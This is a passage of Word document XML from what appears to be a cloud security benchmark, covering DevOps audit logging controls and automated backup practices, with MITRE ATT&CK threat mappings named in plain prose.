      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1149C9" w14:textId="677A8004" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C373AEF" w14:textId="6359BE51" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>impair defenses (T1562) disabling audit logging, security scanning steps, or monitoring agents to operate in blind spots, and indicator removal (T1070) clearing audit logs or pipeline execution history to hide malicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF9631" w14:textId="6615CDAE" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BA888" w14:textId="715D52BD" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t xml:space="preserve">account manipulation (T1098) creating additional service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t>principals</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EA6627">
        <w:t>, personal access tokens, or SSH keys without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DABD27" w14:textId="34023CD0" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE19623" w14:textId="128A54A2" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>data from information repositories (T1213) exfiltrating source code, secrets, or intellectual property through pipeline access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D0FAF" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C62A16" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B8A517" w14:textId="7B6F270B" w:rsidR="00844C45" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D7AEF" w14:textId="33C4748D" w:rsidR="00EA6627" w:rsidRPr="00E53977" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="445"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>unsecured credentials (T1552) harvesting exposed secrets from pipeline logs or execution history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A2E02" w14:textId="66186505" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45" w:rsidP="00844C45">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DS-7.1: Implement Audit Logging for DevOps Platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D6E6E" w14:textId="2B0837F0" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish comprehensive DevOps security monitoring through these capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650D49E" w14:textId="193096D3" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Capture comprehensive security-relevant activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32DF90" w14:textId="4CD7193B" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>and malicious insiders to operate undetected for extended periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACE80A" w14:textId="34A99B57" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Forward logs to centralized SIEM in real-time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8C87E" w14:textId="502B89AC" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00844C45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Forward audit logs in real-time to centralized SIEM platforms rather than relying on DevOps platform native retention (typically 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0B2D0530" w14:textId="69ADB8F9" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy behavioral analytics and anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74826479" w14:textId="41BC178C" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>alerting on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> statistically significant deviations that may indicate compromise or insider threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC55985" w14:textId="3023DBE4" w:rsidR="00844C45" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Configure automated alerting for high-risk activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD4EE9" w14:textId="73A14628" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Configure automated alerting for high-risk activities with immediate notification to security teams: production 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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>security operations</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> immediately while routine events are batched for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F4BA8" w14:textId="085311BF" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate with broader security telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D4CD79" w14:textId="19C8F880" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>correlating phished credentials with subsequent pipeline modifications and unusual cloud resource provisioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E237495" w14:textId="3418E3A6" w:rsidR="00A25030" w:rsidRPr="00E53977" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Leverage integrated SIEM platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505AFCE" w14:textId="64734F32" w:rsidR="00A25030" w:rsidRDefault="00A25030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Platforms like Azure DevOps Audit Streaming with Microsoft Sentinel integration provide real-time log forwarding, pre-built detection rules for DevOps threats, security workbooks for investigation, and automated response orchestration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B39419" w14:textId="5EB10778" w:rsidR="00AA1FA6" w:rsidRDefault="00F83A25" w:rsidP="00F83A25">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc242449572"/>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Backup and Recovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="4E012985" w14:textId="587AD0DC" w:rsidR="00F83A25" w:rsidRDefault="00F83A25" w:rsidP="00F83A25">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc242449573"/>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Backup automation and coverage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="2058B365" w14:textId="3E15EDD3" w:rsidR="00F83A25" w:rsidRDefault="00F83A25" w:rsidP="00F83A25">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc242449574"/>
      <w:r w:rsidRPr="00F83A25">
        <w:t>BR-1: Ensure regular automated backups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="578C31D5" w14:textId="7685A5BB" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCEC91" w14:textId="41BCFE5C" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Implement automated backup for all business-critical resources ensuring consistent protection without manual intervention. Configure appropriate backup frequency and retention periods aligned with Recovery Point Objectives (RPO) and data retention requirements. Enforce backup policies through governance frameworks ensuring comprehensive coverage across resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FC77B" w14:textId="3F2734B4" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F83A25">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="335BF781" w14:textId="05BD3AF1" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Ransomware data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF98A2" w14:textId="2E95E411" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Ransomware attacks encrypt production data with no recovery path when backup copies are absent, corrupted, or also encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9FD638" w14:textId="596E18E9" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Accidental deletion impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFAFED" w14:textId="23EF2712" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Human errors including accidental resource deletion, configuration changes, or data purges cause permanent data loss without backup protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C146D31" w14:textId="51290180" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Infrastructure failure data loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F81F79" w14:textId="6A10586D" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Hardware failures, storage corruption, or regional outages result in complete data loss when backup copies do not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAF77A7" w14:textId="122B866C" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Malicious insider threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC7858" w14:textId="51EEE6B3" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:lastRenderedPageBreak/>
        <w:t>Intentional data deletion or corruption by malicious insiders creates irreversible damage without independent backup copies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C157616" w14:textId="0271AC08" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Application error data corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B069596" w14:textId="32B309B1" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Software bugs, failed updates, or database corruption propagate across production systems without point-in-time recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019505C6" w14:textId="71C46BBB" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Compliance requirement failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDA9877" w14:textId="4C75BBD7" w:rsidR="00F83A25" w:rsidRDefault="00F83A25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83A25">
        <w:t>Regulatory frameworks mandate data retention and recovery capabilities with audit failures when backups are missing or incomplete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D96DF" w14:textId="11DF333F" w:rsidR="005D1B7C" w:rsidRDefault="005D1B7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1B7C">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BA1C94" w14:textId="3169FBAF" w:rsidR="005D1B7C" w:rsidRDefault="005D1B7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1B7C">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AF3B5" w14:textId="7C3D3CAF" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>data destruction (T1485) permanently deleting business-critical data, and data encrypted for impact (T1486) deploying ransomware without recovery options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F061106" w14:textId="6110F480" w:rsidR="005D1B7C" w:rsidRDefault="005D1B7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1B7C">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326EA7A" w14:textId="538C36B4" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>impair defenses (T1562) disabling backup services and deleting backup copies to prevent recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C34C96" w14:textId="615AB770" w:rsidR="005D1B7C" w:rsidRDefault="005D1B7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1B7C">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E6D4B1" w14:textId="20A08240" w:rsidR="00EA6627" w:rsidRDefault="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="446"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>maintaining undetected access to systematically delete backups over time before executing destructive attacks (T1490 - Inhibit System Recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63C461" w14:textId="54462D20" w:rsidR="00AA1FA6" w:rsidRDefault="004573A2" w:rsidP="004573A2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-1.1: Enable automated backup for supported resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDC5277" w14:textId="44ADFEED" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Backup configuration best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E2623A" w14:textId="381B0EC8" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Deploy Azure Backup across resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8D94E0" w14:textId="478B2925" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Enable Azure Backup on all supported business-critical resources including VMs, databases, file shares, and storage accounts ensuring comprehensive protection without coverage gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04A110" w14:textId="0BEF4082" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Configure backup frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A269F" w14:textId="452C4520" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Define backup frequency based on data change rates and RPO requirements using hourly backups for high-transaction databases and daily backups for less frequently changing data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F26DD4" w14:textId="1944D2F5" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:lastRenderedPageBreak/>
        <w:t>Define retention policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB2C2C" w14:textId="404F8D2F" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Establish retention periods meeting regulatory requirements and business needs balancing long-term retention with storage costs typically 30-90 days for operational recovery and 7+ years for compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5303FDD7" w14:textId="664D8B98" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Implement instant restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB68A5" w14:textId="76485847" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="304"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Enable instant restore capability for Azure VM backups allowing rapid recovery from snapshot-based restore points without waiting for full backup restoration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA42D5" w14:textId="77777777" w:rsidR="0028327A" w:rsidRDefault="0028327A" w:rsidP="0028327A"/>
    <w:p w14:paraId="27AF2488" w14:textId="77777777" w:rsidR="004573A2" w:rsidRDefault="004573A2" w:rsidP="004573A2"/>
    <w:p w14:paraId="6336892D" w14:textId="4787C4E5" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004573A2">
        <w:t>Configure backup windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C302F78" w14:textId="5FF456FF" w:rsidR="004573A2" w:rsidRDefault="004573A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
